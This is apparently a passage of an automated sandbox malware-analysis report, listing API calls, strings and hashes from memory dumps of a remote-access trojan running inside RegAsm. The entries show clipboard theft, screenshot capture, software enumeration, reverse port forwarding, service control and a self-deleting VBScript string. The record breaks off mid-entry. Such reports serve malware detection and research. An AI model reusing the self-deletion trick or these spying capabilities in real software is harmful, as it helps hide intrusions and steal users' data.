                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                      • String ID:
                      • API String ID: 161543041-0
                      • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                      • Instruction ID: 673b37a441ff9bbb7eb6cd98574e5fa8379d72fae64c09c4febd1ea684bb8cd8
                      • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                      • Instruction Fuzzy Hash: 0E319E315007009FFB20AA7AD845B5B73E8EF0131AF50851FEC68D7662DF78AD448B59
                      APIs
                      • ___free_lconv_mon.LIBCMT ref: 10007D06
                        • Part of subcall function 100090BA: _free.LIBCMT ref: 100090D7
                        • Part of subcall function 100090BA: _free.LIBCMT ref: 100090E9
                        • Part of subcall function 100090BA: _free.LIBCMT ref: 100090FB
                        • Part of subcall function 100090BA: _free.LIBCMT ref: 1000910D
                        • Part of subcall function 100090BA: _free.LIBCMT ref: 1000911F
                        • Part of subcall function 100090BA: _free.LIBCMT ref: 10009131
                        • Part of subcall function 100090BA: _free.LIBCMT ref: 10009143
                        • Part of subcall function 100090BA: _free.LIBCMT ref: 10009155
                        • Part of subcall function 100090BA: _free.LIBCMT ref: 10009167
                        • Part of subcall function 100090BA: _free.LIBCMT ref: 10009179
                        • Part of subcall function 100090BA: _free.LIBCMT ref: 1000918B
                        • Part of subcall function 100090BA: _free.LIBCMT ref: 1000919D
                        • Part of subcall function 100090BA: _free.LIBCMT ref: 100091AF
                      • _free.LIBCMT ref: 10007CFB
                        • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                        • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                      • _free.LIBCMT ref: 10007D1D
                      • _free.LIBCMT ref: 10007D32
                      • _free.LIBCMT ref: 10007D3D
                      • _free.LIBCMT ref: 10007D5F
                      • _free.LIBCMT ref: 10007D72
                      • _free.LIBCMT ref: 10007D80
                      • _free.LIBCMT ref: 10007D8B
                      • _free.LIBCMT ref: 10007DC3
                      • _free.LIBCMT ref: 10007DCA
                      • _free.LIBCMT ref: 10007DE7
                      • _free.LIBCMT ref: 10007DFF
                      Memory Dump Source
                      • Source File: 00000003.00000002.2931866265.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                      • Associated: 00000003.00000002.2931843207.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2931866265.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_10000000_RegAsm.jbxd
                      Similarity
                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                      • String ID:
                      • API String ID: 161543041-0
                      • Opcode ID: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                      • Instruction ID: 6de9b84f5b51ee4e35cbeb1ed48e08772f21b212059d2ac72beb9c863e9ed859
                      • Opcode Fuzzy Hash: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                      • Instruction Fuzzy Hash: 90313931A04645EFFB21DA38E941B6A77FAFF002D1F11446AE84DDB159DE3ABC809B14
                      APIs
                      • RegEnumKeyExA.ADVAPI32 ref: 0041C6F5
                      • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0041C726
                      • RegCloseKey.ADVAPI32(?), ref: 0041C9BF
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: CloseEnumOpen
                      • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$UninstallString
                      • API String ID: 1332880857-3730529168
                      • Opcode ID: f8c39a8c5312d126ce2fea3caf237c12ed67f6eb61076c5a3b07a390ba7738a1
                      • Instruction ID: 30dd124696def6d144da0f01c12024620090e461f41beb3abd2b2340f2562d2c
                      • Opcode Fuzzy Hash: f8c39a8c5312d126ce2fea3caf237c12ed67f6eb61076c5a3b07a390ba7738a1
                      • Instruction Fuzzy Hash: E961F3711082419AD325EF11D851EEFB3E8BF94309F10493FB589921A2FF789E49CA5A
                      APIs
                      • __EH_prolog.LIBCMT ref: 00419FB9
                      • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 00419FEB
                      • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A077
                      • Sleep.KERNEL32(000003E8), ref: 0041A0FD
                      • GetLocalTime.KERNEL32(?), ref: 0041A105
                      • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A1F4
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                      • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
                      • API String ID: 489098229-1431523004
                      • Opcode ID: 8e408b2f37b5a40c6075e10aa462efa04368c9b3309c0ae95edff302c11cc8c3
                      • Instruction ID: 65e100c03f0dda0ba9a952c873ad8774fe275ee1deca45487f64c7c8a8292b0e
                      • Opcode Fuzzy Hash: 8e408b2f37b5a40c6075e10aa462efa04368c9b3309c0ae95edff302c11cc8c3
                      • Instruction Fuzzy Hash: E7515D70A00215AACB14BBB5C8529ED7BA9AB44308F40403FF509AB1E2EF7C9D85C799
                      APIs
                        • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                        • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                        • Part of subcall function 004136F8: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004752F0), ref: 00413714
                        • Part of subcall function 004136F8: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 0041372D
                        • Part of subcall function 004136F8: RegCloseKey.KERNEL32(00000000), ref: 00413738
                      • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D859
                      • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D9B8
                      • ExitProcess.KERNEL32 ref: 0040D9C4
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                      • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                      • API String ID: 1913171305-3159800282
                      • Opcode ID: 524a6ee67eac097be960b5c691f7399128dd62eb0b1fd7f322d11bf520c9c063
                      • Instruction ID: 6fc8d312854778a25908ca85050b1cee1951ef16e4956e50e312a563d71e527c
                      • Opcode Fuzzy Hash: 524a6ee67eac097be960b5c691f7399128dd62eb0b1fd7f322d11bf520c9c063
                      • Instruction Fuzzy Hash: 0C413A719001195ACB15FA62DC56DEEB778AF50309F10007FB10AB61E2EF785E4ACA98
                      APIs
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: _free
                      • String ID:
                      • API String ID: 269201875-0
                      • Opcode ID: f13b302446b66475bb18d5d42f55ab1b7190c32ccf1072046f607fb9a40aa2ef
                      • Instruction ID: d910990a8472ee08c0279d8077499983e41ff25138a9859a729e4309013b5263
                      • Opcode Fuzzy Hash: f13b302446b66475bb18d5d42f55ab1b7190c32ccf1072046f607fb9a40aa2ef
                      • Instruction Fuzzy Hash: E2C17476D40204AFEB20DBA9CC83FDE77B8AB19705F14015AFE05EB283D6B49D458798
                      APIs
                        • Part of subcall function 004558A9: CreateFileW.KERNEL32(00000000,00000000,?,00455C84,?,?,00000000,?,00455C84,00000000,0000000C), ref: 004558C6
                      • GetLastError.KERNEL32 ref: 00455CEF
                      • __dosmaperr.LIBCMT ref: 00455CF6
                      • GetFileType.KERNEL32(00000000), ref: 00455D02
                      • GetLastError.KERNEL32 ref: 00455D0C
                      • __dosmaperr.LIBCMT ref: 00455D15
                      • CloseHandle.KERNEL32(00000000), ref: 00455D35
                      • CloseHandle.KERNEL32(?), ref: 00455E7F
                      • GetLastError.KERNEL32 ref: 00455EB1
                      • __dosmaperr.LIBCMT ref: 00455EB8
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                      • String ID: H
                      • API String ID: 4237864984-2852464175
                      • Opcode ID: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
                      • Instruction ID: f4290dc4267d91ba683862cdaabef3013db21248f4240db41616def06e578eae
                      • Opcode Fuzzy Hash: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
                      • Instruction Fuzzy Hash: D5A155329106049FDF19AF68DC617BE3BA0EB06325F14415EEC11EB392CB398D5ACB59
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: _free
                      • String ID: \&G$\&G$`&G
                      • API String ID: 269201875-253610517
                      • Opcode ID: 35855cba5d6c4479db42c2a2077b1ccffa38a8944c9ee792822c488c6fc6ed1e
                      • Instruction ID: 0b3297c67b001fbc5a9f4fbe1fd197d652097ca420ae28a40b4f72db8b3ed5d1
                      • Opcode Fuzzy Hash: 35855cba5d6c4479db42c2a2077b1ccffa38a8944c9ee792822c488c6fc6ed1e
                      • Instruction Fuzzy Hash: 77610475900204AFDB20CFA9C882B9ABBF4EF05315F14416BED58EB342D774AD458B98
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 65535$udp
                      • API String ID: 0-1267037602
                      • Opcode ID: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
                      • Instruction ID: ff24d6befd6f0703c902a6165bd45161ed4db0fb5f75d2635e7e580b9b2721aa
                      • Opcode Fuzzy Hash: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
                      • Instruction Fuzzy Hash: EF51E7756093019FDB209B58E9057BB37A4AFC4755F08082FF881973A1E76DCCC1865E
                      APIs
                      • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A892
                      • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A89F
                      • __dosmaperr.LIBCMT ref: 0043A8A6
                      • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8D2
                      • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8DC
                      • __dosmaperr.LIBCMT ref: 0043A8E3
                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A926
                      • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A930
                      • __dosmaperr.LIBCMT ref: 0043A937
                      • _free.LIBCMT ref: 0043A943
                      • _free.LIBCMT ref: 0043A94A
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                      • String ID:
                      • API String ID: 2441525078-0
                      • Opcode ID: dbaba6b5bf7e8e3101b206719032b6e5feaa877e1e5831e4faa096a05e69cc69
                      • Instruction ID: 785efe6d9c8e3fffb8b85045f967b8474775cb8629fdf0d32462ae01257f7f2e
                      • Opcode Fuzzy Hash: dbaba6b5bf7e8e3101b206719032b6e5feaa877e1e5831e4faa096a05e69cc69
                      • Instruction Fuzzy Hash: FF31F57140420AFFDF01AFA5CC45DAF3B68EF09325F10021AF950662A1DB38CD21DB6A
                      APIs
                      • SetEvent.KERNEL32(?,?), ref: 004054BF
                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040556F
                      • TranslateMessage.USER32(?), ref: 0040557E
                      • DispatchMessageA.USER32(?), ref: 00405589
                      • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                      • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405679
                        • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                      • String ID: CloseChat$DisplayMessage$GetMessage
                      • API String ID: 2956720200-749203953
                      • Opcode ID: 77aa4949543ba5eb6ffadb4299bde60f6b95f64bb14a71c8806422ebbd367cdd
                      • Instruction ID: c1940132788662b917c5ec79ff16bb55de46c7435784779dc5fc992d72e4b12f
                      • Opcode Fuzzy Hash: 77aa4949543ba5eb6ffadb4299bde60f6b95f64bb14a71c8806422ebbd367cdd
                      • Instruction Fuzzy Hash: CE41A171604701ABCB14FB75DC5A86F37A9AB85704F40093EF916A36E1EF3C8905CB9A
                      APIs
                        • Part of subcall function 00417F2C: __EH_prolog.LIBCMT ref: 00417F31
                      • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660A4), ref: 00417DDC
                      • CloseHandle.KERNEL32(00000000), ref: 00417DE5
                      • DeleteFileA.KERNEL32(00000000), ref: 00417DF4
                      • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DA8
                        • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                      • String ID: 0VG$0VG$<$@$Temp
                      • API String ID: 1704390241-2575729100
                      • Opcode ID: f9dca7dd06046e6c411ba29df404d481f290ae67984b7d40cebbfb2df60e7368
                      • Instruction ID: cfce1e327495ca125f9f778a73892d1ad62a3a088d665d9de3c725e9e650d499
                      • Opcode Fuzzy Hash: f9dca7dd06046e6c411ba29df404d481f290ae67984b7d40cebbfb2df60e7368
                      • Instruction Fuzzy Hash: 0E415F319002099BCB14FB62DC56AEE7775AF40318F50417EF506764E1EF7C1A8ACB99
                      APIs
                      • OpenClipboard.USER32 ref: 00416941
                      • EmptyClipboard.USER32 ref: 0041694F
                      • CloseClipboard.USER32 ref: 00416955
                      • OpenClipboard.USER32 ref: 0041695C
                      • GetClipboardData.USER32(0000000D), ref: 0041696C
                      • GlobalLock.KERNEL32(00000000), ref: 00416975
                      • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                      • CloseClipboard.USER32 ref: 00416984
                        • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                      • String ID: !D@
                      • API String ID: 2172192267-604454484
                      • Opcode ID: 22318caa46b03491db73261d90afa6b2702e1cfc59c73c6bb5b0d0ad4bd6099c
                      • Instruction ID: 305b70c8a6b081cbeb1fc088e42579eafb4add048c4ccd3ac1cf7446a02d8759
                      • Opcode Fuzzy Hash: 22318caa46b03491db73261d90afa6b2702e1cfc59c73c6bb5b0d0ad4bd6099c
                      • Instruction Fuzzy Hash: CC015E31214301DFC714BB72DC09AAE77A5AF88742F40047EF906821E2DF38CC44CA69
                      APIs
                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB1C
                      • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB33
                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB40
                      • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB4F
                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB60
                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB63
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: Service$CloseHandle$Open$ControlManager
                      • String ID:
                      • API String ID: 221034970-0
                      • Opcode ID: f803f1007c82734b6722f6408504697e53103f3d97c358fc3be63c7478a3d497
                      • Instruction ID: 6fbe0b082825830d9e24babaefac53afed48758aa8e56b4d18e4903ff4329a9c
                      • Opcode Fuzzy Hash: f803f1007c82734b6722f6408504697e53103f3d97c358fc3be63c7478a3d497
                      • Instruction Fuzzy Hash: 41114C71901218AFD711AF64DCC4DFF3B7CDB42B62B000036FA05D2192DB289C46AAFA
                      APIs
                      • _free.LIBCMT ref: 00448135
                        • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                        • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                      • _free.LIBCMT ref: 00448141
                      • _free.LIBCMT ref: 0044814C
                      • _free.LIBCMT ref: 00448157
                      • _free.LIBCMT ref: 00448162
                      • _free.LIBCMT ref: 0044816D
                      • _free.LIBCMT ref: 00448178
                      • _free.LIBCMT ref: 00448183
                      • _free.LIBCMT ref: 0044818E
                      • _free.LIBCMT ref: 0044819C
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: _free$ErrorFreeHeapLast
                      • String ID:
                      • API String ID: 776569668-0
                      • Opcode ID: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                      • Instruction ID: 63500befab30bf138fa449b3e81d3956d19e40097f86fc95f12732a98ce5ff4f
                      • Opcode Fuzzy Hash: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                      • Instruction Fuzzy Hash: C211B67A500508BFEB01EF96C842CDD3BA5FF05359B0240AAFA588F222DA35DF509BC5
                      APIs
                      • _free.LIBCMT ref: 100059EA
                        • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                        • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                      • _free.LIBCMT ref: 100059F6
                      • _free.LIBCMT ref: 10005A01
                      • _free.LIBCMT ref: 10005A0C
                      • _free.LIBCMT ref: 10005A17
                      • _free.LIBCMT ref: 10005A22
                      • _free.LIBCMT ref: 10005A2D
                      • _free.LIBCMT ref: 10005A38
                      • _free.LIBCMT ref: 10005A43
                      • _free.LIBCMT ref: 10005A51
                      Memory Dump Source
                      • Source File: 00000003.00000002.2931866265.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                      • Associated: 00000003.00000002.2931843207.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2931866265.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_10000000_RegAsm.jbxd
                      Similarity
                      • API ID: _free$ErrorFreeHeapLast
                      • String ID:
                      • API String ID: 776569668-0
                      • Opcode ID: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                      • Instruction ID: 60753d52f1e9cb5801f9add085180c5dd3fc305f79823ad6bc57240ee419c635
                      • Opcode Fuzzy Hash: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                      • Instruction Fuzzy Hash: BE11B97E514548FFEB11DF58D842CDE3FA9EF04291B4540A1BD088F12ADA32EE50AB84
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: Eventinet_ntoa
                      • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                      • API String ID: 3578746661-3604713145
                      • Opcode ID: 06dc34667b82452a64d606a5aab8e3928ca29dc07c9083d6286dd20d9cab2733
                      • Instruction ID: 71dfdc03858149a45142756d2b421c0b7bbb6d70992310a40494c7f1f0681c69
                      • Opcode Fuzzy Hash: 06dc34667b82452a64d606a5aab8e3928ca29dc07c9083d6286dd20d9cab2733
                      • Instruction Fuzzy Hash: 0051C131A042015BC614FB36C91AAAE37A5AB85344F40453FF906A76F1EF7C8985C7DE
                      APIs
                      • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00456FFF), ref: 00455F27
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: DecodePointer
                      • String ID: acos$asin$exp$log$log10$pow$sqrt
                      • API String ID: 3527080286-3064271455
                      • Opcode ID: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
                      • Instruction ID: ff4fc8d1aadbe784407353d8516796ad37925c88dabf63da6293f70e8270e0de
                      • Opcode Fuzzy Hash: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
                      • Instruction Fuzzy Hash: 16519F71900909CBCF10CF58E9485BEBBB0FF49306FA14197D841A73A6DB399D298B1E
                      APIs
                      • GetConsoleCP.KERNEL32 ref: 100094D4
                      • __fassign.LIBCMT ref: 1000954F
                      • __fassign.LIBCMT ref: 1000956A
                      • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 10009590
                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 100095AF
                      • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 100095E8
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2931866265.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                      • Associated: 00000003.00000002.2931843207.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2931866265.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_10000000_RegAsm.jbxd
                      Similarity
                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
